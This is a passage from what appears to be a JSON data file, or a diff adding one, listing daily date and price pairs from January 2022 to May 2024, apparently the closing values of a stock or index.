], + [ + "2022-01-05", + 374.25054931640625 + ], + [ + "2022-01-06", + 373.9875183105469 + ], + [ + "2022-01-07", + 369.9362487792969 + ], + [ + "2022-01-10", + 370.1796569824219 + ], + [ + "2022-01-11", + 375.74053955078125 + ], + [ + "2022-01-12", + 377.23052978515625 + ], + [ + "2022-01-13", + 367.7936706542969 + ], + [ + "2022-01-14", + 370.08233642578125 + ], + [ + "2022-01-18", + 360.8695068359375 + ], + [ + "2022-01-19", + 356.9057922363281 + ], + [ + "2022-01-20", + 352.2701416015625 + ], + [ + "2022-01-21", + 342.5021667480469 + ], + [ + "2022-01-24", + 344.07012939453125 + ], + [ + "2022-01-25", + 336.09405517578125 + ], + [ + "2022-01-26", + 335.56817626953125 + ], + [ + "2022-01-27", + 332.1888732910156 + ], + [ + "2022-01-28", + 342.6092834472656 + ], + [ + "2022-01-31", + 353.5654296875 + ], + [ + "2022-02-01", + 355.9708557128906 + ], + [ + "2022-02-02", + 358.86328125 + ], + [ + "2022-02-03", + 344.3136291503906 + ], + [ + "2022-02-04", + 348.6571350097656 + ], + [ + "2022-02-07", + 345.852294921875 + ], + [ + "2022-02-08", + 349.7380065917969 + ], + [ + "2022-02-09", + 357.1492919921875 + ], + [ + "2022-02-10", + 349.0660705566406 + ], + [ + "2022-02-11", + 337.99310302734375 + ], + [ + "2022-02-14", + 338.4118957519531 + ], + [ + "2022-02-15", + 346.8262023925781 + ], + [ + "2022-02-16", + 346.73858642578125 + ], + [ + "2022-02-17", + 336.4252624511719 + ], + [ + "2022-02-18", + 332.5881042480469 + ], + [ + "2022-02-22", + 329.24774169921875 + ], + [ + "2022-02-23", + 320.8139343261719 + ], + [ + "2022-02-24", + 331.5947570800781 + ], + [ + "2022-02-25", + 336.73681640625 + ], + [ + "2022-02-28", + 337.7398986816406 + ], + [ + "2022-03-01", + 332.5686340332031 + ], + [ + "2022-03-02", + 338.14898681640625 + ], + [ + "2022-03-03", + 333.318603515625 + ], + [ + "2022-03-04", + 328.48809814453125 + ], + [ + "2022-03-07", + 316.37310791015625 + ], + [ + "2022-03-08", + 314.9025573730469 + ], + [ + "2022-03-09", + 326.2384948730469 + ], + [ + "2022-03-10", + 322.61566162109375 + ], + [ + "2022-03-11", + 315.92510986328125 + ], + [ + "2022-03-14", + 309.8579406738281 + ], + [ + "2022-03-15", + 319.5771789550781 + ], + [ + "2022-03-16", + 331.42926025390625 + ], + [ + "2022-03-17", + 335.44158935546875 + ], + [ + "2022-03-18", + 342.307373046875 + ], + [ + "2022-03-21", + 341.3557434082031 + ], + [ + "2022-03-22", + 348.0643005371094 + ], + [ + "2022-03-23", + 343.06207275390625 + ], + [ + "2022-03-24", + 350.68719482421875 + ], + [ + "2022-03-25", + 350.39471435546875 + ], + [ + "2022-03-28", + 355.8161926269531 + ], + [ + "2022-03-29", + 361.93963623046875 + ], + [ + "2022-03-30", + 357.94183349609375 + ], + [ + "2022-03-31", + 353.5052185058594 + ], + [ + "2022-04-01", + 352.8324890136719 + ], + [ + "2022-04-04", + 360.0968017578125 + ], + [ + "2022-04-05", + 352.1011047363281 + ], + [ + "2022-04-06", + 344.4564514160156 + ], + [ + "2022-04-07", + 345.2756042480469 + ], + [ + "2022-04-08", + 340.4488830566406 + ], + [ + "2022-04-11", + 332.39483642578125 + ], + [ + "2022-04-12", + 330.99078369140625 + ], + [ + "2022-04-13", + 337.7187194824219 + ], + [ + "2022-04-14", + 329.99603271484375 + ], + [ + "2022-04-18", + 330.2496032714844 + ], + [ + "2022-04-19", + 337.6309509277344 + ], + [ + "2022-04-20", + 332.706787109375 + ], + [ + "2022-04-21", + 325.82275390625 + ], + [ + "2022-04-22", + 317.2907409667969 + ], + [ + "2022-04-25", + 321.3666076660156 + ], + [ + "2022-04-26", + 309.2366943359375 + ], + [ + "2022-04-27", + 308.8661193847656 + ], + [ + "2022-04-28", + 319.8357849121094 + ], + [ + "2022-04-29", + 305.443603515625 + ], + [ + "2022-05-02", + 310.54327392578125 + ], + [ + "2022-05-03", + 310.8747863769531 + ], + [ + "2022-05-04", + 321.3861389160156 + ], + [ + "2022-05-05", + 305.19976806640625 + ], + [ + "2022-05-06", + 301.54327392578125 + ], + [ + "2022-05-09", + 289.74481201171875 + ], + [ + "2022-05-10", + 293.26483154296875 + ], + [ + "2022-05-11", + 284.5671691894531 + ], + [ + "2022-05-12", + 283.894287109375 + ], + [ + "2022-05-13", + 294.4154357910156 + ], + [ + "2022-05-16", + 291.00262451171875 + ], + [ + "2022-05-17", + 298.5399475097656 + ], + [ + "2022-05-18", + 283.8845520019531 + ], + [ + "2022-05-19", + 282.3634338378906 + ], + [ + "2022-05-20", + 281.4858703613281 + ], + [ + "2022-05-23", + 286.1662902832031 + ], + [ + "2022-05-24", + 280.0816650390625 + ], + [ + "2022-05-25", + 284.0015869140625 + ], + [ + "2022-05-26", + 291.8704833984375 + ], + [ + "2022-05-27", + 301.3970031738281 + ], + [ + "2022-05-31", + 300.59747314453125 + ], + [ + "2022-06-01", + 298.374267578125 + ], + [ + "2022-06-02", + 306.5454406738281 + ], + [ + "2022-06-03", + 298.5692443847656 + ], + [ + "2022-06-06", + 299.5638122558594 + ], + [ + "2022-06-07", + 302.14776611328125 + ], + [ + "2022-06-08", + 299.97344970703125 + ], + [ + "2022-06-09", + 291.93878173828125 + ], + [ + "2022-06-10", + 281.6418762207031 + ], + [ + "2022-06-13", + 268.5466003417969 + ], + [ + "2022-06-14", + 269.0340881347656 + ], + [ + "2022-06-15", + 275.75244140625 + ], + [ + "2022-06-16", + 264.6268005371094 + ], + [ + "2022-06-17", + 267.844482421875 + ], + [ + "2022-06-21", + 274.6021728515625 + ], + [ + "2022-06-22", + 274.2016296386719 + ], + [ + "2022-06-23", + 278.2852478027344 + ], + [ + "2022-06-24", + 287.8203125 + ], + [ + "2022-06-27", + 285.7100830078125 + ], + [ + "2022-06-28", + 277.0054016113281 + ], + [ + "2022-06-29", + 277.2594299316406 + ], + [ + "2022-06-30", + 273.82061767578125 + ], + [ + "2022-07-01", + 275.6279602050781 + ], + [ + "2022-07-05", + 280.34661865234375 + ], + [ + "2022-07-06", + 282.1441345214844 + ], + [ + "2022-07-07", + 288.1817626953125 + ], + [ + "2022-07-08", + 288.54327392578125 + ], + [ + "2022-07-11", + 282.37872314453125 + ], + [ + "2022-07-12", + 279.6431884765625 + ], + [ + "2022-07-13", + 279.0668029785156 + ], + [ + "2022-07-14", + 280.0633544921875 + ], + [ + "2022-07-15", + 285.14349365234375 + ], + [ + "2022-07-18", + 282.7303466796875 + ], + [ + "2022-07-19", + 291.4252014160156 + ], + [ + "2022-07-20", + 296.0462951660156 + ], + [ + "2022-07-21", + 300.2960205078125 + ], + [ + "2022-07-22", + 295.0301818847656 + ], + [ + "2022-07-25", + 293.3498840332031 + ], + [ + "2022-07-26", + 287.58587646484375 + ], + [ + "2022-07-27", + 299.7391052246094 + ], + [ + "2022-07-28", + 302.6700134277344 + ], + [ + "2022-07-29", + 308.18975830078125 + ], + [ + "2022-08-01", + 308.0041809082031 + ], + [ + "2022-08-02", + 307.0858154296875 + ], + [ + "2022-08-03", + 315.4485168457031 + ], + [ + "2022-08-04", + 316.92376708984375 + ], + [ + "2022-08-05", + 314.3348693847656 + ], + [ + "2022-08-08", + 313.3187561035156 + ], + [ + "2022-08-09", + 309.77239990234375 + ], + [ + "2022-08-10", + 318.4184265136719 + ], + [ + "2022-08-11", + 316.6111145019531 + ], + [ + "2022-08-12", + 322.7757568359375 + ], + [ + "2022-08-15", + 325.3841857910156 + ], + [ + "2022-08-16", + 324.6221008300781 + ], + [ + "2022-08-17", + 320.9195251464844 + ], + [ + "2022-08-18", + 321.6912841796875 + ], + [ + "2022-08-19", + 315.4192199707031 + ], + [ + "2022-08-22", + 307.1151428222656 + ], + [ + "2022-08-23", + 306.8611755371094 + ], + [ + "2022-08-24", + 307.7500915527344 + ], + [ + "2022-08-25", + 313.1918029785156 + ], + [ + "2022-08-26", + 300.3546447753906 + ], + [ + "2022-08-29", + 297.39447021484375 + ], + [ + "2022-08-30", + 294.08251953125 + ], + [ + "2022-08-31", + 292.37286376953125 + ], + [ + "2022-09-01", + 292.4999694824219 + ], + [ + "2022-09-02", + 288.3673400878906 + ], + [ + "2022-09-06", + 286.2962341308594 + ], + [ + "2022-09-07", + 292.0798645019531 + ], + [ + "2022-09-08", + 293.5941467285156 + ], + [ + "2022-09-09", + 300.0126953125 + ], + [ + "2022-09-12", + 303.57855224609375 + ], + [ + "2022-09-13", + 286.9312744140625 + ], + [ + "2022-09-14", + 289.2075500488281 + ], + [ + "2022-09-15", + 284.3912048339844 + ], + [ + "2022-09-16", + 282.6521911621094 + ], + [ + "2022-09-19", + 284.8533020019531 + ], + [ + "2022-09-20", + 282.582763671875 + ], + [ + "2022-09-21", + 277.5227966308594 + ], + [ + "2022-09-22", + 274.10711669921875 + ], + [ + "2022-09-23", + 269.6441955566406 + ], + [ + "2022-09-26", + 268.5284729003906 + ], + [ + "2022-09-27", + 268.6361389160156 + ], + [ + "2022-09-28", + 273.9798889160156 + ], + [ + "2022-09-29", + 266.0816650390625 + ], + [ + "2022-09-30", + 261.5698547363281 + ], + [ + "2022-10-03", + 267.7062683105469 + ], + [ + "2022-10-04", + 276.123291015625 + ], + [ + "2022-10-05", + 275.9764709472656 + ], + [ + "2022-10-06", + 273.8037414550781 + ], + [ + "2022-10-07", + 263.3706359863281 + ], + [ + "2022-10-10", + 260.7379150390625 + ], + [ + "2022-10-11", + 257.1559143066406 + ], + [ + "2022-10-12", + 257.0677795410156 + ], + [ + "2022-10-13", + 263.0966491699219 + ], + [ + "2022-10-14", + 255.18862915039062 + ], + [ + "2022-10-17", + 263.6153259277344 + ], + [ + "2022-10-18", + 265.6999816894531 + ], + [ + "2022-10-19", + 264.73101806640625 + ], + [ + "2022-10-20", + 263.3804626464844 + ], + [ + "2022-10-21", + 269.5561218261719 + ], + [ + "2022-10-24", + 272.5215759277344 + ], + [ + "2022-10-25", + 278.1589050292969 + ], + [ + "2022-10-26", + 272.0127258300781 + ], + [ + "2022-10-27", + 267.0604553222656 + ], + [ + "2022-10-28", + 275.23260498046875 + ], + [ + "2022-10-31", + 272.0323181152344 + ], + [ + "2022-11-01", + 269.2527160644531 + ], + [ + "2022-11-02", + 260.0234375 + ], + [ + "2022-11-03", + 254.94398498535156 + ], + [ + "2022-11-04", + 259.04473876953125 + ], + [ + "2022-11-07", + 261.89288330078125 + ], + [ + "2022-11-08", + 263.8013000488281 + ], + [ + "2022-11-09", + 257.71368408203125 + ], + [ + "2022-11-10", + 276.7300109863281 + ], + [ + "2022-11-11", + 281.8291320800781 + ], + [ + "2022-11-14", + 279.36279296875 + ], + [ + "2022-11-15", + 283.2286376953125 + ], + [ + "2022-11-16", + 279.36279296875 + ], + [ + "2022-11-17", + 278.7461242675781 + ], + [ + "2022-11-18", + 278.7560119628906 + ], + [ + "2022-11-21", + 275.88836669921875 + ], + [ + "2022-11-22", + 279.86187744140625 + ], + [ + "2022-11-23", + 282.6708068847656 + ], + [ + "2022-11-25", + 280.8113098144531 + ], + [ + "2022-11-28", + 276.6908874511719 + ], + [ + "2022-11-29", + 274.5965270996094 + ], + [ + "2022-11-30", + 287.1141662597656 + ], + [ + "2022-12-01", + 287.46649169921875 + ], + [ + "2022-12-02", + 286.32135009765625 + ], + [ + "2022-12-05", + 281.5159912109375 + ], + [ + "2022-12-06", + 275.68280029296875 + ], + [ + "2022-12-07", + 274.5573425292969 + ], + [ + "2022-12-08", + 277.806640625 + ], + [ + "2022-12-09", + 276.0351257324219 + ], + [ + "2022-12-12", + 279.499755859375 + ], + [ + "2022-12-13", + 282.50439453125 + ], + [ + "2022-12-14", + 280.40997314453125 + ], + [ + "2022-12-15", + 270.9948425292969 + ], + [ + "2022-12-16", + 268.4109191894531 + ], + [ + "2022-12-19", + 264.63885498046875 + ], + [ + "2022-12-20", + 264.4328918457031 + ], + [ + "2022-12-21", + 268.268798828125 + ], + [ + "2022-12-22", + 261.7055358886719 + ], + [ + "2022-12-23", + 262.2941589355469 + ], + [ + "2022-12-27", + 258.58575439453125 + ], + [ + "2022-12-28", + 255.1717071533203 + ], + [ + "2022-12-29", + 261.3916015625 + ], + [ + "2022-12-30", + 261.234619140625 + ], + [ + "2023-01-03", + 259.46875 + ], + [ + "2023-01-04", + 260.7048645019531 + ], + [ + "2023-01-05", + 256.6236572265625 + ], + [ + "2023-01-06", + 263.70684814453125 + ], + [ + "2023-01-09", + 265.41387939453125 + ], + [ + "2023-01-10", + 267.66046142578125 + ], + [ + "2023-01-11", + 272.29107666015625 + ], + [ + "2023-01-12", + 273.7626647949219 + ], + [ + "2023-01-13", + 275.64630126953125 + ], + [ + "2023-01-17", + 276.2054748535156 + ], + [ + "2023-01-18", + 272.6147766113281 + ], + [ + "2023-01-19", + 269.9365539550781 + ], + [ + "2023-01-20", + 277.3238525390625 + ], + [ + "2023-01-23", + 283.48492431640625 + ], + [ + "2023-01-24", + 282.9061279296875 + ], + [ + "2023-01-25", + 282.2782287597656 + ], + [ + "2023-01-26", + 287.7818908691406 + ], + [ + "2023-01-27", + 290.6466064453125 + ], + [ + "2023-01-30", + 284.77008056640625 + ], + [ + "2023-01-31", + 289.0376281738281 + ], + [ + "2023-02-01", + 295.21826171875 + ], + [ + "2023-02-02", + 305.8136291503906 + ], + [ + "2023-02-03", + 300.3786315917969 + ], + [ + "2023-02-06", + 297.8376770019531 + ], + [ + "2023-02-07", + 304.00848388671875 + ], + [ + "2023-02-08", + 298.6028747558594 + ], + [ + "2023-02-09", + 295.9638671875 + ], + [ + "2023-02-10", + 294.0213928222656 + ], + [ + "2023-02-13", + 298.73040771484375 + ], + [ + "2023-02-14", + 300.93780517578125 + ], + [ + "2023-02-15", + 303.2432861328125 + ], + [ + "2023-02-16", + 297.55322265625 + ], + [ + "2023-02-17", + 295.4537048339844 + ], + [ + "2023-02-21", + 288.4588317871094 + ], + [ + "2023-02-22", + 288.6746520996094 + ], + [ + "2023-02-23", + 291.1959228515625 + ], + [ + "2023-02-24", + 286.3200988769531 + ], + [ + "2023-02-27", + 288.3704833984375 + ], + [ + "2023-02-28", + 287.9977111816406 + ], + [ + "2023-03-01", + 285.6824645996094 + ], + [ + "2023-03-02", + 288.0467224121094 + ], + [ + "2023-03-03", + 294.001708984375 + ], + [ + "2023-03-06", + 294.3353271484375 + ], + [ + "2023-03-07", + 290.7250671386719 + ], + [ + "2023-03-08", + 292.17706298828125 + ], + [ + "2023-03-09", + 287.11474609375 + ], + [ + "2023-03-10", + 283.08258056640625 + ], + [ + "2023-03-13", + 285.1820983886719 + ], + [ + "2023-03-14", + 291.7355651855469 + ], + [ + "2023-03-15", + 293.26593017578125 + ], + [ + "2023-03-16", + 300.9967041015625 + ], + [ + "2023-03-17", + 299.5741271972656 + ], + [ + "2023-03-20", + 300.6372985839844 + ], + [ + "2023-03-21", + 304.93115234375 + ], + [ + "2023-03-22", + 300.78466796875 + ], + [ + "2023-03-23", + 304.3514099121094 + ], + [ + "2023-03-24", + 305.4715881347656 + ], + [ + "2023-03-27", + 303.3786926269531 + ], + [ + "2023-03-28", + 301.7672424316406 + ], + [ + "2023-03-29", + 307.2696228027344 + ], + [ + "2023-03-30", + 310.1780700683594 + ], + [ + "2023-03-31", + 315.3365478515625 + ], + [ + "2023-04-03", + 314.57012939453125 + ], + [ + "2023-04-04", + 313.50897216796875 + ], + [ + "2023-04-05", + 310.4139099121094 + ], + [ + "2023-04-06", + 312.5067138671875 + ], + [ + "2023-04-10", + 312.3299255371094 + ], + [ + "2023-04-11", + 310.325439453125 + ], + [ + "2023-04-12", + 307.5841064453125 + ], + [ + "2023-04-13", + 313.6072082519531 + ], + [ + "2023-04-14", + 313.0177001953125 + ], + [ + "2023-04-17", + 313.282958984375 + ], + [ + "2023-04-18", + 313.3026123046875 + ], + [ + "2023-04-19", + 313.15521240234375 + ], + [ + "2023-04-20", + 310.7676086425781 + ], + [ + "2023-04-21", + 311.0918884277344 + ], + [ + "2023-04-24", + 310.4433288574219 + ], + [ + "2023-04-25", + 304.58721923828125 + ], + [ + "2023-04-26", + 306.4344482421875 + ], + [ + "2023-04-27", + 314.7667236328125 + ], + [ + "2023-04-28", + 316.9381103515625 + ], + [ + "2023-05-01", + 316.5746154785156 + ], + [ + "2023-05-02", + 313.8135681152344 + ], + [ + "2023-05-03", + 311.7599792480469 + ], + [ + "2023-05-04", + 310.6595458984375 + ], + [ + "2023-05-05", + 317.2624206542969 + ], + [ + "2023-05-08", + 318.0484619140625 + ], + [ + "2023-05-09", + 316.0342102050781 + ], + [ + "2023-05-10", + 319.4732360839844 + ], + [ + "2023-05-11", + 320.5146789550781 + ], + [ + "2023-05-12", + 319.3650817871094 + ], + [ + "2023-05-15", + 321.09442138671875 + ], + [ + "2023-05-16", + 321.4579772949219 + ], + [ + "2023-05-17", + 325.3489685058594 + ], + [ + "2023-05-18", + 331.3916931152344 + ], + [ + "2023-05-19", + 330.6450500488281 + ], + [ + "2023-05-22", + 331.7552795410156 + ], + [ + "2023-05-23", + 327.5498962402344 + ], + [ + "2023-05-24", + 325.8697204589844 + ], + [ + "2023-05-25", + 333.79913330078125 + ], + [ + "2023-05-26", + 342.3277587890625 + ], + [ + "2023-05-30", + 343.8802795410156 + ], + [ + "2023-05-31", + 341.9248962402344 + ], + [ + "2023-06-01", + 345.8749084472656 + ], + [ + "2023-06-02", + 348.4688415527344 + ], + [ + "2023-06-05", + 348.71453857421875 + ], + [ + "2023-06-06", + 348.6555480957031 + ], + [ + "2023-06-07", + 342.7405090332031 + ], + [ + "2023-06-08", + 346.9949645996094 + ], + [ + "2023-06-09", + 348.3214416503906 + ], + [ + "2023-06-12", + 354.20709228515625 + ], + [ + "2023-06-13", + 356.9288635253906 + ], + [ + "2023-06-14", + 359.5227355957031 + ], + [ + "2023-06-15", + 363.80682373046875 + ], + [ + "2023-06-16", + 361.517333984375 + ], + [ + "2023-06-20", + 360.9998474121094 + ], + [ + "2023-06-21", + 356.0802917480469 + ], + [ + "2023-06-22", + 360.2816467285156 + ], + [ + "2023-06-23", + 356.7099304199219 + ], + [ + "2023-06-26", + 351.92803955078125 + ], + [ + "2023-06-27", + 357.9792175292969 + ], + [ + "2023-06-28", + 358.6778259277344 + ], + [ + "2023-06-29", + 357.9595642089844 + ], + [ + "2023-06-30", + 363.4793395996094 + ], + [ + "2023-07-03", + 364.3353576660156 + ], + [ + "2023-07-05", + 364.3255615234375 + ], + [ + "2023-07-06", + 361.55084228515625 + ], + [ + "2023-07-07", + 360.3504943847656 + ], + [ + "2023-07-10", + 360.4685363769531 + ], + [ + "2023-07-11", + 362.2494812011719 + ], + [ + "2023-07-12", + 366.82464599609375 + ], + [ + "2023-07-13", + 373.0528564453125 + ], + [ + "2023-07-14", + 372.97418212890625 + ], + [ + "2023-07-17", + 376.45721435546875 + ], + [ + "2023-07-18", + 379.53692626953125 + ], + [ + "2023-07-19", + 379.4483947753906 + ], + [ + "2023-07-20", + 370.7013244628906 + ], + [ + "2023-07-21", + 369.5894470214844 + ], + [ + "2023-07-24", + 370.1798095703125 + ], + [ + "2023-07-25", + 372.6888122558594 + ], + [ + "2023-07-26", + 371.4490661621094 + ], + [ + "2023-07-27", + 370.56353759765625 + ], + [ + "2023-07-28", + 377.313232421875 + ], + [ + "2023-07-31", + 377.510009765625 + ], + [ + "2023-08-01", + 376.6343688964844 + ], + [ + "2023-08-02", + 368.36944580078125 + ], + [ + "2023-08-03", + 367.77911376953125 + ], + [ + "2023-08-04", + 366.0572204589844 + ], + [ + "2023-08-07", + 369.15655517578125 + ], + [ + "2023-08-08", + 366.017822265625 + ], + [ + "2023-08-09", + 361.9936218261719 + ], + [ + "2023-08-10", + 362.6626892089844 + ], + [ + "2023-08-11", + 360.3504943847656 + ], + [ + "2023-08-14", + 364.39434814453125 + ], + [ + "2023-08-15", + 360.5275573730469 + ], + [ + "2023-08-16", + 356.7099304199219 + ], + [ + "2023-08-17", + 352.81365966796875 + ], + [ + "2023-08-18", + 352.37091064453125 + ], + [ + "2023-08-21", + 358.048095703125 + ], + [ + "2023-08-22", + 357.53643798828125 + ], + [ + "2023-08-23", + 363.17425537109375 + ], + [ + "2023-08-24", + 355.4112548828125 + ], + [ + "2023-08-25", + 358.1661682128906 + ], + [ + "2023-08-28", + 360.8620910644531 + ], + [ + "2023-08-29", + 368.7432556152344 + ], + [ + "2023-08-30", + 370.7996826171875 + ], + [ + "2023-08-31", + 371.9115295410156 + ], + [ + "2023-09-01", + 371.5179138183594 + ], + [ + "2023-09-05", + 371.9902648925781 + ], + [ + "2023-09-06", + 368.7137756347656 + ], + [ + "2023-09-07", + 366.0768737792969 + ], + [ + "2023-09-08", + 366.5885314941406 + ], + [ + "2023-09-11", + 370.9079284667969 + ], + [ + "2023-09-12", + 366.7951965332031 + ], + [ + "2023-09-13", + 368.1922607421875 + ], + [ + "2023-09-14", + 371.203125 + ], + [ + "2023-09-15", + 364.846923828125 + ], + [ + "2023-09-18", + 365.2273254394531 + ], + [ + "2023-09-19", + 364.4489440917969 + ], + [ + "2023-09-20", + 359.19696044921875 + ], + [ + "2023-09-21", + 352.6148986816406 + ], + [ + "2023-09-22", + 352.6641845703125 + ], + [ + "2023-09-25", + 354.3392028808594 + ], + [ + "2023-09-26", + 349.0184326171875 + ], + [ + "2023-09-27", + 349.83624267578125 + ], + [ + "2023-09-28", + 352.76275634765625 + ], + [ + "2023-09-29", + 353.0189514160156 + ], + [ + "2023-10-02", + 355.965087890625 + ], + [ + "2023-10-03", + 349.71807861328125 + ], + [ + "2023-10-04", + 354.47723388671875 + ], + [ + "2023-10-05", + 353.4327087402344 + ], + [ + "2023-10-06", + 359.3547058105469 + ], + [ + "2023-10-09", + 361.18743896484375 + ], + [ + "2023-10-10", + 363.18768310546875 + ], + [ + "2023-10-11", + 365.7790832519531 + ], + [ + "2023-10-12", + 364.508056640625 + ], + [ + "2023-10-13", + 359.9261779785156 + ], + [ + "2023-10-16", + 363.99560546875 + ], + [ + "2023-10-17", + 362.80340576171875 + ], + [ + "2023-10-18", + 358.04412841796875 + ], + [ + "2023-10-19", + 354.6939697265625 + ], + [ + "2023-10-20", + 349.4026794433594 + ], + [ + "2023-10-23", + 350.4570007324219 + ], + [ + "2023-10-24", + 353.8663330078125 + ], + [ + "2023-10-25", + 345.20513916015625 + ], + [ + "2023-10-26", + 338.6230773925781 + ], + [ + "2023-10-27", + 340.2488708496094 + ], + [ + "2023-10-30", + 344.0818786621094 + ], + [ + "2023-10-31", + 345.7274169921875 + ], + [ + "2023-11-01", + 351.7281494140625 + ], + [ + "2023-11-02", + 358.1131286621094 + ], + [ + "2023-11-03", + 362.3205261230469 + ], + [ + "2023-11-06", + 363.798583984375 + ], + [ + "2023-11-07", + 367.2374267578125 + ], + [ + "2023-11-08", + 367.47393798828125 + ], + [ + "2023-11-09", + 364.6459655761719 + ], + [ + "2023-11-10", + 372.84405517578125 + ], + [ + "2023-11-13", + 371.6813049316406 + ], + [ + "2023-11-14", + 379.6822509765625 + ], + [ + "2023-11-15", + 379.9680480957031 + ], + [ + "2023-11-16", + 380.29327392578125 + ], + [ + "2023-11-17", + 380.38189697265625 + ], + [ + "2023-11-20", + 385.0130310058594 + ], + [ + "2023-11-21", + 382.7763366699219 + ], + [ + "2023-11-22", + 384.3430480957031 + ], + [ + "2023-11-24", + 383.80108642578125 + ], + [ + "2023-11-27", + 383.4660339355469 + ], + [ + "2023-11-28", + 384.4710693359375 + ], + [ + "2023-11-29", + 384.0966491699219 + ], + [ + "2023-11-30", + 383.1310119628906 + ], + [ + "2023-12-01", + 384.2247314453125 + ], + [ + "2023-12-04", + 380.6578369140625 + ], + [ + "2023-12-05", + 381.61358642578125 + ], + [ + "2023-12-06", + 379.40643310546875 + ], + [ + "2023-12-07", + 384.7076110839844 + ], + [ + "2023-12-08", + 386.42205810546875 + ], + [ + "2023-12-11", + 389.72296142578125 + ], + [ + "2023-12-12", + 392.8267822265625 + ], + [ + "2023-12-13", + 397.82244873046875 + ], + [ + "2023-12-14", + 397.4776611328125 + ], + [ + "2023-12-15", + 399.3990478515625 + ], + [ + "2023-12-18", + 401.9147033691406 + ], + [ + "2023-12-19", + 403.9682922363281 + ], + [ + "2023-12-20", + 397.96551513671875 + ], + [ + "2023-12-21", + 402.595947265625 + ], + [ + "2023-12-22", + 403.1982116699219 + ], + [ + "2023-12-26", + 405.66650390625 + ], + [ + "2023-12-27", + 406.4922790527344 + ], + [ + "2023-12-28", + 406.29473876953125 + ], + [ + "2023-12-29", + 404.53643798828125 + ], + [ + "2024-01-02", + 397.6907653808594 + ], + [ + "2024-01-03", + 393.48260498046875 + ], + [ + "2024-01-04", + 391.4575500488281 + ], + [ + "2024-01-05", + 391.9218444824219 + ], + [ + "2024-01-08", + 400.02203369140625 + ], + [ + "2024-01-09", + 400.8122863769531 + ], + [ + "2024-01-10", + 403.52886962890625 + ], + [ + "2024-01-11", + 404.3684997558594 + ], + [ + "2024-01-12", + 404.575927734375 + ], + [ + "2024-01-16", + 404.53643798828125 + ], + [ + "2024-01-17", + 402.2545166015625 + ], + [ + "2024-01-18", + 407.9642028808594 + ], + [ + "2024-01-19", + 416.0545349121094 + ], + [ + "2024-01-22", + 416.5978088378906 + ], + [ + "2024-01-23", + 418.3265686035156 + ], + [ + "2024-01-24", + 420.6479187011719 + ], + [ + "2024-01-25", + 421.16156005859375 + ], + [ + "2024-01-26", + 418.65252685546875 + ], + [ + "2024-01-29", + 422.939697265625 + ], + [ + "2024-01-30", + 420.1243591308594 + ], + [ + "2024-01-31", + 411.895751953125 + ], + [ + "2024-02-01", + 416.7460021972656 + ], + [ + "2024-02-02", + 423.78924560546875 + ], + [ + "2024-02-05", + 423.23602294921875 + ], + [ + "2024-02-06", + 422.38653564453125 + ], + [ + "2024-02-07", + 426.7330017089844 + ], + [ + "2024-02-08", + 427.52325439453125 + ], + [ + "2024-02-09", + 431.7314147949219 + ], + [ + "2024-02-12", + 430.0422058105469 + ], + [ + "2024-02-13", + 423.3348388671875 + ], + [ + "2024-02-14", + 427.947998046875 + ], + [ + "2024-02-15", + 429.22235107421875 + ], + [ + "2024-02-16", + 425.33026123046875 + ], + [ + "2024-02-20", + 422.11981201171875 + ], + [ + "2024-02-21", + 420.4305725097656 + ], + [ + "2024-02-22", + 432.7389831542969 + ], + [ + "2024-02-23", + 431.4646911621094 + ], + [ + "2024-02-26", + 431.2374267578125 + ], + [ + "2024-02-27", + 432.274658203125 + ], + [ + "2024-02-28", + 429.9730224609375 + ], + [ + "2024-02-29", + 433.6576232910156 + ], + [ + "2024-03-01", + 440.18719482421875 + ], + [ + "2024-03-04", + 438.6165466308594 + ], + [ + "2024-03-05", + 430.7434997558594 + ], + [ + "2024-03-06", + 433.4501953125 + ], + [ + "2024-03-07", + 440.0291748046875 + ], + [ + "2024-03-08", + 433.6774597167969 + ], + [ + "2024-03-11", + 432.0672607421875 + ], + [ + "2024-03-12", + 438.260986328125 + ], + [ + "2024-03-13", + 434.8924865722656 + ], + [ + "2024-03-14", + 433.79595947265625 + ], + [ + "2024-03-15", + 428.6395263671875 + ], + [ + "2024-03-18", + 432.7276306152344 + ], + [ + "2024-03-19", + 433.8057861328125 + ], + [ + "2024-03-20", + 438.9492492675781 + ], + [ + "2024-03-21", + 441.0265197753906 + ], + [ + "2024-03-22", + 441.5309143066406 + ], + [ + "2024-03-25", + 439.92852783203125 + ], + [ + "2024-03-26", + 438.504150390625 + ], + [ + "2024-03-27", + 439.9977722167969 + ], + [ + "2024-03-28", + 439.1866760253906 + ], + [ + "2024-04-01", + 440.116455078125 + ], + [ + "2024-04-02", + 436.318115234375 + ], + [ + "2024-04-03", + 437.29742431640625 + ], + [ + "2024-04-04", + 430.61083984375 + ], + [ + "2024-04-05", + 435.6850891113281 + ], + [ + "2024-04-08", + 435.813720703125 + ], + [ + "2024-04-09", + 437.42596435546875 + ], + [ + "2024-04-10", + 433.60791015625 + ], + [ + "2024-04-11", + 440.53192138671875 + ], + [ + "2024-04-12", + 433.509033203125 + ], + [ + "2024-04-15", + 426.3773498535156 + ], + [ + "2024-04-16", + 426.4169006347656 + ], + [ + "2024-04-17", + 421.21405029296875 + ], + [ + "2024-04-18", + 418.81048583984375 + ], + [ + "2024-04-19", + 410.1455993652344 + ], + [ + "2024-04-22", + 414.27032470703125 + ], + [ + "2024-04-23", + 420.452392578125 + ], + [ + "2024-04-24", + 421.87677001953125 + ], + [ + "2024-04-25", + 419.839111328125 + ], + [ + "2024-04-26", + 426.3180236816406 + ], + [ + "2024-04-29", + 428.0489807128906 + ], + [ + "2024-04-30", + 419.9776306152344 + ], + [ + "2024-05-01", + 416.9410095214844 + ], + [ + "2024-05-02", + 422.2625427246094 + ], + [ + "2024-05-03", + 430.74932861328125 + ], + [ + "2024-05-06", + 435.467529296875 + ], + [ + "2024-05-07", + 435.5367431640625 + ], + [ + "2024-05-08", + 435.27960205078125 + ], + [ + "2024-05-09", + 436.2291259765625 + ], + [ + "2024-05-10", + 437.2578430175781 + ], + [ + "2024-05-13", + 438.2667236328125 + ], + [ + "2024-05-14", + 441.0857849121094 + ], + [ + "2024-05-15", + 447.9800720214844 + ], + [ + "2024-05-16", + 447.0700988769531 + ], + [ + "2024-05-17", + 446.85247802734375 + ], + [ + "2024-05-20", + 449.9682922363281 + ], + [ + "2024-05-21", + 450.8485412597656 + ], + [ + "2024-05-22", + 450.7595520019531 + ], + [ + "2024-05-23", + 448.7318420410156 + ], + [ + "2024-05-24", + 452.9752502441406 + ], + [ + "2024-05-28", + 454.6864318847656 + ], + [ + "2024-05-29", + 451.4816589355469 + ], + [ + "2024-05-30", + 446.64471435546875 + 